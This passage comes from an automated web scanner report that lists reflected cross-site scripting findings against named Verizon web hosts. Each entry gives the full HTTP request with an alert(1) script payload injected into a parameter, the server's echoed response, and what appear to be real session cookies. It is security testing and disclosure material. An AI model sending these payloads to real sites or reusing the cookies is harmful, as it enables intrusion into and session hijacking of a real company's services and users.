Content-Length: 481

serviceType=ANY&fVZTState=&route=validateService&state=&serviceId=1ea0c'%3balert(1)//5fb68b88c27&securityCheck=validated&state=&select=serialCircuit&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&fState=&textfield=&textfield=&textfie
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:16:05 GMT
Connection: keep-alive
Content-Length: 55599


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<li
...[SNIP]...
="hide";
       document.getElementById("linkShow").className="show";
       document.getElementById("linkHide").className="hide"
       
   }
   function ticketdata_func()
   {        
       ticket_data = 'Service_id: '+'1EA0C';ALERT(1)//5FB68B88C27';
       
       aims_setExtraCustomerInfo('EMTS_TICKET_INFO',ticket_data);
   }    

function MM_findObj(n, d) { //v4.01
var p,i,x;
if(!d)
d=document;
if((p=n.index
...[SNIP]...

3.6. https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketMainDispatch.do [serviceType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/default/irepair/QuickTicketMainDispatch.do

Issue detail

The value of the serviceType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 248ca"><img%20src%3da%20onerror%3dalert(1)>b84734f6a04 was submitted in the serviceType parameter. This input was echoed as 248ca"><img src=a onerror=alert(1)>b84734f6a04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /enterprisesolutions/default/irepair/QuickTicketMainDispatch.do?route=evaluateServiceId HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
Cache-Control: max-age=0
Origin: https://enterprisecenter.verizon.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; vzAppID=; V347=CT-2; LOB_CATEGORY=; Product=A; ProductXML=A; vzpers=STATE=TX; vzapps=STATE=TX; ED_SESSIONID=KxTbMnyP2zr9LhVwBk93rzd6dKK0TBqL2ZNYgJg4qC0TFgJwDMP5!2085112158!-2093491878; pref_lang=en-US; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; BusinessUnit=business
Content-Length: 481

serviceType=ANY248ca"><img%20src%3da%20onerror%3dalert(1)>b84734f6a04&fVZTState=&route=validateService&state=&serviceId=%27&securityCheck=validated&state=&select=serialCircuit&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textfield=&textf
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:14:12 GMT
Connection: keep-alive
Content-Length: 37554


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<li
...[SNIP]...
<input id = "savedServiceType" class="hide" value="ANY248ca"><img src=a onerror=alert(1)>b84734f6a04"/>
...[SNIP]...

3.7. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b439"><script>alert(1)</script>14a07652aec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439"><script>alert(1)</script>14a07652aec/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 359
Content-Type: text/html
Cache-Control: private
Content-Length: 359

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net8b439"><script>alert(1)</script>14a07652aec/homepage/708539588/Top/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

3.8. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce74"><script>alert(1)</script>92b0fb76a8b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage2ce74"><script>alert(1)</script>92b0fb76a8b/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage2ce74"><script>alert(1)</script>92b0fb76a8b/L15/230690700/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&po
...[SNIP]...

3.9. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53b64"><script>alert(1)</script>22bd36ebe57 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top53b64"><script>alert(1)</script>22bd36ebe57?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 352
Content-Type: text/html
Cache-Control: private
Content-Length: 352

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/1247056197/Top53b64"><script>alert(1)</script>22bd36ebe57/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

3.10. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [audio_conf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the audio_conf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd15"><script>alert(1)</script>e9b1c6ac9bf was submitted in the audio_conf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=fbd15"><script>alert(1)</script>e9b1c6ac9bf&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=fbd15"><script>alert(1)</script>e9b1c6ac9bf&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.11. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [bbaw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the bbaw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b04e9"><script>alert(1)</script>88b43b9e841 was submitted in the bbaw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=b04e9"><script>alert(1)</script>88b43b9e841&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=b04e9"><script>alert(1)</script>88b43b9e841&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.12. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [connex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the connex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95f66"><script>alert(1)</script>944d611ec25 was submitted in the connex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=95f66"><script>alert(1)</script>944d611ec25&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
latformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=95f66"><script>alert(1)</script>944d611ec25&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_
...[SNIP]...

3.13. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [fiostvown parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the fiostvown request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc55a"><script>alert(1)</script>061e019d33 was submitted in the fiostvown parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=dc55a"><script>alert(1)</script>061e019d33&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1392
Content-Type: text/html
Cache-Control: private
Content-Length: 1392

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=dc55a"><script>alert(1)</script>061e019d33&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.14. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [fiosvoice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the fiosvoice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12655"><script>alert(1)</script>19403df38df was submitted in the fiosvoice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=12655"><script>alert(1)</script>19403df38df&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=12655"><script>alert(1)</script>19403df38df&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.15. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [msp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the msp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d52"><script>alert(1)</script>08e01549957 was submitted in the msp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=c2d52"><script>alert(1)</script>08e01549957&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=c2d52"><script>alert(1)</script>08e01549957&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.16. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 198e7"><script>alert(1)</script>2bc9a424ec6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

